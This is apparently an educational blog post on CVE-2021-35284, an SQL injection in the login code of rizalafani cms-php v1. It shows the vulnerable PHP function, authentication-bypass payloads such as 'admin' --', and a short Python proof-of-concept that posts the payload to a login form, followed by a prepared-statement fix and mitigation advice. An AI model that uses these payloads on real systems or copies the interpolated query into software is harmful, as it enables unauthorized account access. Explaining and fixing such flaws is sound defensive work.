In this post, we'll explore the SQL Injection vulnerability identified as CVE-2021-35284 in the get_user function of the login_manager.php file in rizalafani cms-php v1. This guide offers a clear explanation, example code snippets, links to official references, and a step-by-step walk-through of how the exploit can be used. For both developers and security enthusiasts, this article breaks down the mechanics behind the vulnerability in simple language.
## What is CVE-2021-35284?
CVE-2021-35284 is a critical SQL Injection vulnerability that exists due to the improper handling of user-supplied input in the get_user function of the login_manager.php script in the open-source content management system rizalafani cms-php v1. If exploited successfully, attackers can manipulate SQL queries and gain unauthorized access to sensitive data, including user credentials.
## Official References
- NVD CVE-2021-35284
- GitHub Source Code (cms-php/login_manager.php)
- Exploit-DB Entry *(If available)*
## Where is the Issue?
The vulnerable code is found in the get_user function, which is responsible for fetching user data from the database based on the username provided, usually during the login process.
Here is a simplified code snippet (taken from the project source):

```php
// login_manager.php
function get_user($username) {
    $conn = mysqli_connect("localhost", "user", "pass", "db");
    // $username is interpolated straight into the query text: this is the flaw
    $sql = "SELECT * FROM users WHERE username = '$username'";
    $result = mysqli_query($conn, $sql);
    return mysqli_fetch_assoc($result);
}
```
## What's Wrong?
Notice that the variable $username is included directly in the SQL query without any sanitization or use of prepared statements. If an attacker can control the $username, they can inject arbitrary SQL code.
## How the Exploit Works
Let's walk through a real-world exploitation scenario.

Let's say an attacker submits the following as the username during login:

```
admin' --
```

This will make the SQL query look like:

```sql
SELECT * FROM users WHERE username = 'admin' -- ';
```

The `--` in SQL starts a comment, so anything after it is ignored. The attacker has essentially told the system to just fetch the user admin, and ignore the password check that usually happens after.

- *Bypass Password Check:*

```
' OR 1=1 --
```

```sql
SELECT * FROM users WHERE username = '' OR 1=1 -- ';
```

This will return all users.

- *Extract Data (Blind):*

Attackers can use UNION SELECT or other advanced payloads if the system outputs data.
---
## Proof-of-Concept (PoC) Exploit
Below is a basic exploit example using Python's requests library:

```python
import requests

url = 'http://target-website.com/login.php'

# The vulnerable field here is 'username'
payload = "admin' -- "

data = {
    "username": payload,
    "password": "doesntmatter"
}

response = requests.post(url, data=data)

# Placeholder check: what a successful login actually returns depends on the
# application, so inspect the response body rather than trusting the status code.
if response.ok:
    print('Request accepted; inspect the response for a logged-in page.')
else:
    print('Exploit failed.')
```

- Note: Replace `url` with the actual URL where the login form exists.
---
## How to Fix
Never put user input directly into SQL queries!
Safe Approach (PHP with mysqli):

```php
function get_user($username) {
    $conn = mysqli_connect("localhost", "user", "pass", "db");
    // The query text contains only a placeholder, never the raw input
    $stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
    // Bind the input as a string parameter; it travels separately from the SQL
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $result = $stmt->get_result();
    return $result->fetch_assoc();
}
```

- Here, we use prepared statements and bind variables to avoid injection.
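To see why the two versions of get_user behave so differently on the inputs from the exploit walk-through, here is an added, self-contained Python example (not code from the original post or from cms-php) that builds a constructed in-memory SQLite users table and runs the interpolated query and the parameterized query side by side:

```python
import sqlite3

# Constructed sample data standing in for the CMS users table.
SAMPLE_USERS = [("admin", "admin-password-hash"), ("alice", "alice-password-hash")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def get_user_vulnerable(conn, username):
    # Mirrors the original get_user: the input is pasted into the SQL text,
    # so a quote or a comment marker inside it rewrites the query itself.
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def get_user_safe(conn, username):
    # Mirrors the fixed get_user: the input is bound as a parameter and is
    # only ever compared as a literal string, quotes and all.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def compare(username):
    """Return (vulnerable_result, safe_result) for one submitted username."""
    conn = make_db()
    try:
        return get_user_vulnerable(conn, username), get_user_safe(conn, username)
    finally:
        conn.close()


if __name__ == "__main__":
    for submitted in ["admin", "admin' --", "' OR 1=1 --"]:
        vulnerable, safe = compare(submitted)
        print(f"{submitted!r:16} vulnerable -> {vulnerable}   safe -> {safe}")
```

The comment-based payload makes the interpolated query return the admin row, and the tautology returns every row, while the parameterized query returns nothing for either because no username literally equals those strings.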
---
## Mitigation Steps
- Update rizalafani cms-php to the latest version (if available)
- Always use prepared statements or parameterized queries
- Regularly review code for user input handling
- Employ Web Application Firewalls (WAF)
- Educate your team about security basics
---
## Conclusion
CVE-2021-35284 in rizalafani cms-php v1 shows how easily a system can become vulnerable if developers neglect basic input sanitization principles. By understanding this flaw and following safe coding standards, you can safeguard your applications against similar attacks.
### For Further Reading:
- SQL Injection Explained - OWASP
- PHP Prepared Statements
Stay safe, and always validate your inputs!
---
> *This article is an exclusive deep dive for educational and awareness purposes. Test only on systems you have permission to use.*
## Timeline
Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/28/2022 18:29:00 UTC